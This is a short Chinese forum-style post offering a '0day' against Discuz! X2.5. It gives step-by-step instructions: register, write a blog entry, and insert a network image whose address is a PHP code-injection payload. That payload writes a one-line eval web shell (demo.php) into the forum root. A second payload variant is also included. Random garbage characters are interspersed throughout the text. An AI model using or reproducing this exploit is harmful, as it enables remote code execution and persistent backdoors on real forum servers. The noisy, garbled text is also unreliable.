DZ X2.5最新0day+ ^* K2 @9 U7 l
1.注册任意账户
9 y; d0 p. C5 K U/ ?- m* u" w2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了% r w# C+ k6 O+ N/ C* d6 J
3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码4 R9 n; `$ h' L1 J# s
<?php @eval($_POST[c]); ?>ok8 L _" Y" W* l. T/ d
<?fputs(fopen("dome","w"),"<?eval(\$_POST[c]);?>")?>
& ^3 f9 N, ?2 B, D \& ?0 h$ q8 D4.访问日志,论坛根目录下生成demo.php,一句发密码C |